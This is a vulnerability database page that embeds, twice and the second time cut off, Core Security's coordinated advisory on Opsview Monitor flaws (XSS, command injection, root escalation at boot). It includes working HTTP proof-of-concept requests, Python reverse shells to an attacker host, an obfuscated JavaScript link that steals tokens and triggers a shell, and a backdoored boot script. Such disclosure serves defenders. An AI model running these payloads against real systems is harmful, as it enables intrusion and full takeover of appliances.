VARIoT IoT vulnerabilities database
| VAR-201809-0903 | CVE-2018-16145 |
Opsview Monitor Vulnerabilities related to authorization, permissions, and access control
Related entries in the VARIoT exploits database: VAR-E-201602-0212 |
CVSS V2: 9.3 CVSS V3: 8.1 Severity: HIGH |
The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance. Opsview Monitor Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a local privilege escalation vulnerability that allows an attacker to gain full control of a device by upgrading its privileges from nagios users to root after the system is restarted. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
1. **Advisory Information**
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL:
http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
2. **Vulnerability Information**
Class: Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Special Elements used in an OS
Command [CWE-78], Improper Neutralization of Special Elements used in
an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,
CVE-2018-16145
3. **Vulnerability Description**
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how
the performance of their hybrid IT infrastructure & apps impacts
business service delivery. Opsview Monitor supports +3500 Nagios plugins
and service checks making it easy to monitor everything from Docker and
VMware to Amazon Web Services, Hyper-V and more.
4. **Vulnerable Packages**
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
5. **Vendor Information, Solutions and Workarounds**
Opsview released the following versions of its product that fix the
reported issues. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
6. **Credits**
These vulnerabilities were discovered and researched by Fernando Diaz
and Fernando Catoira from Core Security Consulting Services. The
publication of this advisory was coordinated by Leandro Cuozzo from Core
Advisories Team.
7.
Multiple vulnerabilities were found in the context of this appliance,
which could allow a remote attacker to compromise the system.
Vulnerabilities described in 7.1 and 7.2 could be abused to execute
malicious JavaScript code in the context of a legitimate user.
In addition, issues presented in 7.3 and 7.4 could allow an attacker to
obtain command execution on the system as the nagios user.
7.1. **Reflected Cross-Site Scripting in Diagnostics**
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest'
endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/-----
GET
/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;
auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. **Persistent Cross-Site Scripting in Settings endpoint**
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router'
endpoint is vulnerable to Cross-Site Scripting. The following proof of
concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;
auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/
The input will be stored without any sanitization and rendered every
time the /settings section is visited by the user. It's important to
point that this XSS is self stored and it's executed only in the context
of the victim's session. However, this vulnerability can be exploited by
an attacker to gain persistency and execute the malicious code each time
the victim accesses to the settings section.
Excerpt of the source code showing the injected script tag:
/-----
[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/
7.3. **Notification abuse leading to remote command execution**
[CVE-2018-16146] Opsview Web Management console provides a functionality
accessible by an authenticated administrator to test notifications that
are triggered under certain configurable events. The 'value' parameter
is not properly sanitized, leading to an arbitrary command injection
executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)
Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;
opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;
auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
{"message":"Test
Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123
|| python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection
functionality within the management console and the vulnerability
described in 7.1 (Reflected Cross-Site Scripting), to build a specially
crafted link that could be sent to an administrator to trigger a reverse
shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This
token could be obtained by a Cross-Site Scripting attack from a specific
endpoint (/settings). Abuse the login page redirection functionality to force the user to
access the Cross-Site Scripting vulnerable URL described in 7.1 (you may
also abuse the Cross-Site scripting vulnerability reported in
https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present).
If the user is already authenticated he will be automatically redirected.
Otherwise, the login page will appear and the redirection will take
place after a successful login.
The following proof of concept presents a crafted link that could
trigger a reverse shell if accessed by an administrator:
/-----
https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1
-----/
Once clicked, the authenticated administrator will be redirected to the
vulnerable section where his browser will perform a request to the
'/settings' endpoint in order to obtain a valid 'restToken'. Finally,
using that token, the API request to
'rest/config/notificationmethod/testnotification' will be exploited thus
resulting in a reverse shell.
7.4. **Rancid test connection functionality abuse leading to command
execution**
[CVE-2018-16144] NetAudit is a section within Network Analyzer that
allows the user to automate the backing up of network devices'
configuration files to a centralized location. The test connection
functionality is vulnerable to command injection due to an improper
sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;
auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34
UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. However, the
'/etc/init.d/opsview-reporting-module' script invokes the
'/opt/opsview/jasper/bin/db_jasper' script before dropping root
privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
echo "Attempted to start jasperserver but MySQL credentials are wrong."
exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
su - opsview -c "$DAEMON $@"
else
exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the
vulnerable script, can be edited by the nagios user which belongs to the
'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017
/opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later
used in a case statement, an attacker could edit that specific part of
the script in order to execute arbitrary code once the appliance is
rebooted.
The following excerpt shows the attacker's bash script which, after
execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
case "$1" in
db_export)
db_export
;;
db_export_test)
db_export_test
;;
db_export_initial)
TEST=1
db_backup
;;
db_import)
db_import
;;
db_install)
db_install
;;
db_backup)
db_backup
;;
db_restore)
db_restore
;;
db_exists)
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
db_exists
exit $?
;;
db_upgrade)
db_upgrade
exit $?
;;
*)
die "Usage: $0
{db_export|db_import|db_install|db_backup|db_restore}"
;;
esac
shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
8. **Report Timeline**
2018-05-03: Core Security sent an initial notification to Opsview,
asking for GPG keys in order to send draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed
an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of
the reported vulnerabilities and confirmed that they were present in all
supported versions of Opsview Monitor (5.4, 5.3 and 5.2).
In addition, Opsview informed that were planning to release a fix for
these versions by the end of July.
2018-05-11: Core Security thanked the confirmation.
2018-06-25: Opsview informed that they were planning to release a major
update for the product (6.0) at the end of July. This update will
address all reported vulnerabilities. Also, they informed that the
previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked the status update and asked for a
tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the
end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with the Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0
release will be available on July 25th. In addition, they
informed that they didn't have the exact release date for the updates to
previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining
fixes.
2018-08-13: Opsview replied saying that they were targeting the week of
August 24th for release the fixes of their earlier product versions and
they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed
versions will be available on August 29th.
2018-08-24: Core Security thanked the update and proposed September 4th
as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
9. **References**
[1] https://www.opsview.com/solutions
10. **About CoreLabs**
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://corelabs.coresecurity.com.
11. **About Core Security**
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. **Disclaimer**
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201809-0904 | CVE-2018-16146 |
Opsview Monitor Command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201602-0212 |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account. Opsview Monitor The monitor contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
1. **Advisory Information**
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL:
http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
2. **Vulnerability Information**
Class: Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Special Elements used in an OS
Command [CWE-78], Improper Neutralization of Special Elements used in
an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,
CVE-2018-16145
3. **Vulnerability Description**
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how
the performance of their hybrid IT infrastructure & apps impacts
business service delivery. Opsview Monitor supports +3500 Nagios plugins
and service checks making it easy to monitor everything from Docker and
VMware to Amazon Web Services, Hyper-V and more.
4. **Vulnerable Packages**
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
5. **Vendor Information, Solutions and Workarounds**
Opsview released the following versions of its product that fix the
reported issues. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
6. **Credits**
These vulnerabilities were discovered and researched by Fernando Diaz
and Fernando Catoira from Core Security Consulting Services. The
publication of this advisory was coordinated by Leandro Cuozzo from Core
Advisories Team.
7.
Multiple vulnerabilities were found in the context of this appliance,
which could allow a remote attacker to compromise the system.
Vulnerabilities described in 7.1 and 7.2 could be abused to execute
malicious JavaScript code in the context of a legitimate user. Finally, the
issue found in one of the scripts run during the boot process presented
in 7.5 would allow attackers to elevate their privileges from nagios
user to root after a system restart, hence obtaining full control of the
appliance.
7.1. **Reflected Cross-Site Scripting in Diagnostics**
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest'
endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/-----
GET
/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;
auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. **Persistent Cross-Site Scripting in Settings endpoint**
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router'
endpoint is vulnerable to Cross-Site Scripting. The following proof of
concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;
auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/
The input will be stored without any sanitization and rendered every
time the /settings section is visited by the user. It's important to
point that this XSS is self stored and it's executed only in the context
of the victim's session. However, this vulnerability can be exploited by
an attacker to gain persistency and execute the malicious code each time
the victim accesses to the settings section.
Excerpt of the source code showing the injected script tag:
/-----
